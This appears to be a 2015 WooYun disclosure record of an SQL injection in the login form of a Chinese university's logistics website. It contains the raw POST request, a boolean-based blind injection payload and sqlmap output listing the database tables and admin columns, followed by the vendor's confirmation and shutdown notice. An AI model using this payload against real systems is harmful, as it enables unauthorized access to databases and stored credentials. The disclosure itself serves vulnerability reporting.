乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-23: 细节已通知厂商并且等待厂商处理中 2015-11-23: 厂商已经确认,细节仅向厂商公开 2015-11-30: 厂商已经修复漏洞并主动公开,细节向公众公开
rt
http://hqbzc.upc.edu.cn/ 中国石油大学(华东)东营校区后勤保障处
POST /room/login.asp?action=pass HTTP/1.1Content-Length: 101Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://hqbzc.upc.edu.cnCookie: ASPSESSIONIDAQCQCCQB=LBGLMJLBJJNMPMNABNLNIAHNHost: hqbzc.upc.edu.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*password=g00dPa%24%24w0rD&username=-1
username参数存在注入
qlmap resumed the following injection point(s) from stored session:---Parameter: username (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (Microsoft Access comment) Payload: password=g00dPa$$w0rD&username=-6927' OR 1015=1015%16---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, ASPback-end DBMS: Microsoft AccessDatabase: Microsoft_Access_masterdb[6 tables]+------------+| admin || adv || article || content || guestbook || indexation |+------------+
sqlmap resumed the following injection point(s) from stored session:---Parameter: username (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (Microsoft Access comment) Payload: password=g00dPa$$w0rD&username=-6927' OR 1015=1015%16---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, ASPback-end DBMS: Microsoft AccessDatabase: Microsoft_Access_masterdbTable: admin[5 columns]+----------+-------------+| Column | Type |+----------+-------------+| classid | numeric || id | numeric || password | non-numeric || type | numeric || username | non-numeric |+----------+-------------+
危害等级:中
漏洞Rank:8
确认时间:2015-11-23 15:13
感谢您对学校的网络安全的关注,我们会尽快解决该问题。
2015-11-30:系统已经停止服务,谢谢!